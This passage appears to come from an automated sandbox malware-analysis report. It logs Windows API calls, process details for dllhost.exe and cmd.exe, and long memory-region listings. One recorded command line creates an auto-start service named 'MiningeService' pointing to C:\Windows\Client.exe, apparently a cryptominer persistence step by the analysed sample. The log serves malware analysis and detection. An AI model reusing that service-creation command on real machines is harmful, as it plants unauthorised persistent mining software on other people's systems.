dwMessageId=0x424, dwLanguageId=0x0, lpBuffer=0x1d9380, nSize=0x400, Arguments=0x0 | out: lpBuffer="The specified service does not exist as an installed service.\r\n") returned 0x3f [0272.238] FormatMessageW (in: dwFlags=0x2900, lpSource=0x0, dwMessageId=0x65, dwLanguageId=0x0, lpBuffer=0x2df8dc, nSize=0x2, Arguments=0x2df8e8 | out: lpBuffer="ᨰ[༄\x11\x03") returned 0x62 [0272.350] GetFileType (hFile=0x214) returned 0x3 [0272.350] LocalAlloc (uFlags=0x0, uBytes=0xc4) returned 0x5b33f0 [0272.350] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", cchWideChar=98, lpMultiByteStr=0x5b33f0, cbMultiByte=196, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[SC] OpenService FAILED 1060:\r\n\r\nThe specified service does not exist as an installed service.\r\n\r\n", lpUsedDefaultChar=0x0) returned 98 [0272.351] WriteFile (in: hFile=0x214, lpBuffer=0x5b33f0*, nNumberOfBytesToWrite=0x62, lpNumberOfBytesWritten=0x2df8cc, lpOverlapped=0x0 | out: lpBuffer=0x5b33f0*, lpNumberOfBytesWritten=0x2df8cc*=0x62, lpOverlapped=0x0) returned 1 [0272.351] LocalFree (hMem=0x5b33f0) returned 0x0 [0272.351] LocalFree (hMem=0x5b1a30) returned 0x0 [0272.351] LocalFree (hMem=0x0) returned 0x0 [0272.407] CloseServiceHandle (hSCObject=0x5af7c8) returned 1 [0272.447] exit (_Code=1060) Thread: id = 223 os_tid = 0xa1c Process: id = "26" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x659fc000" os_pid = "0x9f0" os_integrity_level = "0x4000" os_privileges = "0x20860080" monitor_reason = "rpc_server" parent_id = "4" os_parent_pid = "0x248" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xe], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000d101" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Region: id = 5841 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5842 start_va = 0x20000 end_va = 0x20fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 5843 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 5844 start_va = 0x40000 end_va = 0x40fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000040000" filename = "" Region: id = 5845 start_va = 0x50000 end_va = 0x50fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5846 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5847 start_va = 0x90000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000090000" filename = "" Region: id = 5848 start_va = 0x190000 end_va = 0x1f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5849 start_va = 0x2b0000 end_va = 0x3affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000002b0000" filename = "" Region: id = 5850 start_va = 0x3b0000 end_va = 0x48efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 5851 start_va = 0x4a0000 end_va = 0x4affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004a0000" filename = "" Region: id = 5852 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 5853 start_va = 0x5b0000 end_va = 0x737fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005b0000" filename = "" Region: id = 5854 start_va = 0x740000 end_va = 0x8c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000740000" filename = "" Region: id = 5855 start_va = 0x8d0000 end_va = 0x1ccffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008d0000" filename = "" Region: id = 5856 start_va = 0x1db0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 5857 start_va = 0x1f30000 end_va = 0x202ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f30000" filename = "" Region: id = 5858 start_va = 0x2030000 end_va = 0x22fefff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 5859 start_va = 0x23e0000 end_va = 0x23effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023e0000" filename = "" Region: id = 5860 start_va = 0x2420000 end_va = 0x251ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002420000" filename = "" Region: id = 5861 start_va = 0x2520000 end_va = 0x261ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002520000" filename = "" Region: id = 5862 start_va = 0x2630000 end_va = 0x272ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002630000" filename = "" Region: id = 5863 start_va = 0x2840000 end_va = 0x293ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002840000" filename = "" Region: id = 5864 start_va = 0x2a70000 end_va = 0x2aeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002a70000" filename = "" Region: id = 5865 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5866 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5867 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5868 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5869 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5870 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5871 start_va = 0xff210000 end_va = 0xff216fff monitored = 0 entry_point = 0xff21124c region_type = mapped_file name = "dllhost.exe" filename = "\\Windows\\System32\\dllhost.exe" (normalized: "c:\\windows\\system32\\dllhost.exe") Region: id = 5872 start_va = 0x7fef2610000 end_va = 0x7fef26affff monitored = 0 entry_point = 0x7fef268eb20 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_a4d6a923711520a9\\comctl32.dll") Region: id = 5873 start_va = 0x7fefc070000 end_va = 0x7fefc0c5fff monitored = 0 entry_point = 0x7fefc07bbc0 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 5874 start_va = 0x7fefc220000 end_va = 0x7fefc243fff monitored = 0 entry_point = 0x7fefc221024 region_type = mapped_file name = "shacct.dll" filename = "\\Windows\\System32\\shacct.dll" (normalized: "c:\\windows\\system32\\shacct.dll") Region: id = 5875 start_va = 0x7fefcaf0000 end_va = 0x7fefcb0dfff monitored = 0 entry_point = 0x7fefcaf13b8 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 5876 start_va = 0x7fefcd40000 end_va = 0x7fefcd86fff monitored = 0 entry_point = 0x7fefcd41064 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 5877 start_va = 0x7fefd040000 end_va = 0x7fefd057fff monitored = 0 entry_point = 0x7fefd043b48 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5878 start_va = 0x7fefd640000 end_va = 0x7fefd64efff monitored = 0 entry_point = 0x7fefd641010 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5879 start_va = 0x7fefd730000 end_va = 0x7fefd743fff monitored = 0 entry_point = 0x7fefd7310e0 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 5880 start_va = 0x7fefd750000 end_va = 0x7fefd75efff monitored = 0 entry_point = 0x7fefd7519b0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5881 start_va = 0x7fefd970000 end_va = 0x7fefd9dbfff monitored = 0 entry_point = 0x7fefd972780 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5882 start_va = 0x7fefdca0000 end_va = 0x7fefdd38fff monitored = 0 entry_point = 0x7fefdca1c10 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5883 start_va = 0x7fefdd40000 end_va = 0x7fefde6cfff monitored = 0 entry_point = 0x7fefdd8ed50 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5884 start_va = 0x7fefde70000 end_va = 0x7fefded6fff monitored = 0 entry_point = 0x7fefde7b03c region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5885 start_va = 0x7fefec70000 end_va = 0x7fefed78fff monitored = 0 entry_point = 0x7fefec71064 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5886 start_va = 0x7fefef30000 end_va = 0x7fefefa0fff monitored = 0 entry_point = 0x7fefef41e20 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 5887 start_va = 0x7fefefb0000 end_va = 0x7feff08afff monitored = 0 entry_point = 0x7fefefd0760 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5888 start_va = 0x7feff090000 end_va = 0x7feff12efff monitored = 0 entry_point = 0x7feff0925a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5889 start_va = 0x7feff140000 end_va = 0x7feff15efff monitored = 0 entry_point = 0x7feff1460e8 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5890 start_va = 0x7feff1e0000 end_va = 0x7feff2b6fff monitored = 0 entry_point = 0x7feff1e3274 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5891 start_va = 0x7feff2c0000 end_va = 0x7feff2edfff monitored = 0 entry_point = 0x7feff2c1010 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5892 start_va = 0x7feff2f0000 end_va = 0x7feff4f2fff monitored = 0 entry_point = 0x7feff313330 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 5893 start_va = 0x7feff5a0000 end_va = 0x7feff5adfff monitored = 0 entry_point = 0x7feff5a1080 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 5894 start_va = 0x7feff5b0000 end_va = 0x7feff678fff monitored = 0 entry_point = 0x7feff62a874 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 5895 start_va = 0x7feffb20000 end_va = 0x7feffb20fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5896 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 5897 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 5898 start_va = 0x7fffffd4000 end_va = 0x7fffffd5fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd4000" filename = "" Region: id = 5899 start_va = 0x7fffffd6000 end_va = 0x7fffffd7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd6000" filename = "" Region: id = 5900 start_va = 0x7fffffd8000 end_va = 0x7fffffd9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffd8000" filename = "" Region: id = 5901 start_va = 0x7fffffda000 end_va = 0x7fffffdbfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffda000" filename = "" Region: id = 5902 start_va = 0x7fffffdc000 end_va = 0x7fffffddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffdc000" filename = "" Region: id = 5903 start_va = 0x7fffffde000 end_va = 0x7fffffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 5940 start_va = 0x7fef98c0000 end_va = 0x7fef98d1fff monitored = 0 entry_point = 0x7fef98c101c region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Thread: id = 224 os_tid = 0xa18 Thread: id = 225 os_tid = 0xa14 Thread: id = 226 os_tid = 0xa10 Thread: id = 227 os_tid = 0xa04 Thread: id = 228 os_tid = 0xa00 Thread: id = 229 os_tid = 0x9f8 Thread: id = 230 os_tid = 0x9f4 Process: id = "27" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x6c64e000" os_pid = "0xa20" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "17" os_parent_pid = "0xc94" cmd_line = "C:\\Windows\\system32\\cmd.exe /C Sc create MiningeService binpath= C:\\Windows\\Client.exe start= auto DisplayName= MiningeService" cur_dir = "C:\\Windows\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e771" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 5907 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 5908 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5909 start_va = 0x40000 end_va = 0x40fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 5910 start_va = 0x50000 end_va = 0x53fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 5911 start_va = 0x60000 end_va = 0x60fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 5912 start_va = 0x190000 end_va = 0x1cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000190000" filename = "" Region: id = 5913 start_va = 0x1e0000 end_va = 0x2dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 5914 start_va = 0x4aaa0000 end_va = 0x4aaebfff monitored = 1 entry_point = 0x4aaa829a region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe") Region: id = 5915 start_va = 0x77800000 end_va = 0x779a8fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 5916 start_va = 0x779e0000 end_va = 0x77b5ffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 5917 start_va = 0x7efb0000 end_va = 0x7efd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 5918 start_va = 0x7efdb000 end_va = 0x7efddfff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 5919 start_va = 0x7efde000 end_va = 0x7efdefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 5920 start_va = 0x7efdf000 end_va = 0x7efdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 5921 start_va = 0x7efe0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 5922 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 5923 start_va = 0x7fff0000 end_va = 0x7fffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 5924 start_va = 0x4c0000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004c0000" filename = "" Region: id = 5925 start_va = 0x75250000 end_va = 0x75257fff monitored = 0 entry_point = 0x752520f8 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 5926 start_va = 0x75260000 end_va = 0x752bbfff monitored = 0 entry_point = 0x7529f9f4 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 5927 start_va = 0x752c0000 end_va = 0x752fefff monitored = 0 entry_point = 0x752ee088 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 5928 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5929 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5930 start_va = 0x776e0000 end_va = 0x777fefff monitored = 0 entry_point = 0x776f5340 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5931 start_va = 0x776e0000 end_va = 0x777fefff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000776e0000" filename = "" Region: id = 5932 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 0 entry_point = 0x775fa2c8 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5933 start_va = 0x775e0000 end_va = 0x776d9fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000775e0000" filename = "" Region: id = 5934 start_va = 0x540000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 5935 start_va = 0x769b0000 end_va = 0x76abffff monitored = 0 entry_point = 0x769c3283 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 5936 start_va = 0x76fe0000 end_va = 0x77026fff monitored = 0 entry_point = 0x76fe74c1 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 5937 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 5938 start_va = 0x7efe0000 end_va = 0x7f0dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 5939 start_va = 0x7f0e0000 end_va = 0x7ffdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 5941 start_va = 0x20000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 5942 start_va = 0x70000 end_va = 0xd6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 5943 start_va = 0x76cc0000 end_va = 0x76d6bfff monitored = 0 entry_point = 0x76cca472 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 5944 start_va = 0x75400000 end_va = 0x75406fff monitored = 0 entry_point = 0x75401230 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\SysWOW64\\winbrand.dll" (normalized: "c:\\windows\\syswow64\\winbrand.dll") Region: id = 5945 start_va = 0x773b0000 end_va = 0x774affff monitored = 0 entry_point = 0x773cb6ed region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 5946 start_va = 0x77240000 end_va = 0x772cffff monitored = 0 entry_point = 0x77256343 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 5947 start_va = 0x75780000 end_va = 0x75789fff monitored = 0 entry_point = 0x757836a0 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\SysWOW64\\lpk.dll" (normalized: "c:\\windows\\syswow64\\lpk.dll") Region: id = 5948 start_va = 0x76ac0000 end_va = 0x76b5cfff monitored = 0 entry_point = 0x76af3fd7 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\SysWOW64\\usp10.dll" (normalized: "c:\\windows\\syswow64\\usp10.dll") Region: id = 5949 start_va = 0x76c20000 end_va = 0x76cbffff monitored = 0 entry_point = 0x76c349e5 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 5950 start_va = 0x76900000 end_va = 0x76918fff monitored = 0 entry_point = 0x76904975 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 5951 start_va = 0x75bc0000 end_va = 0x75caffff monitored = 0 entry_point = 0x75bd0569 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 5952 start_va = 0x75530000 end_va = 0x7558ffff monitored = 0 entry_point = 0x7554a3b3 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 5953 start_va = 0x75520000 end_va = 0x7552bfff monitored = 0 entry_point = 0x755210e1 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 5954 start_va = 0xe0000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 5955 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5956 start_va = 0x120000 end_va = 0x12ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000120000" filename = "" Region: id = 5957 start_va = 0x2e0000 end_va = 0x467fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000002e0000" filename = "" Region: id = 5958 start_va = 0xe0000 end_va = 0xfdfff monitored = 0 entry_point = 0xf158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5959 start_va = 0x76b90000 end_va = 0x76beffff monitored = 0 entry_point = 0x76ba158f region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 5960 start_va = 0x774b0000 end_va = 0x7757bfff monitored = 0 entry_point = 0x774b168b region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 5961 start_va = 0x540000 end_va = 0x6c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 5962 start_va = 0x720000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 5963 start_va = 0x820000 end_va = 0x1c1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000820000" filename = "" Region: id = 5964 start_va = 0xe0000 end_va = 0xfffff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "cmd.exe.mui" filename = "\\Windows\\SysWOW64\\en-US\\cmd.exe.mui" (normalized: "c:\\windows\\syswow64\\en-us\\cmd.exe.mui") Region: id = 5965 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 5966 start_va = 0x100000 end_va = 0x100fff monitored = 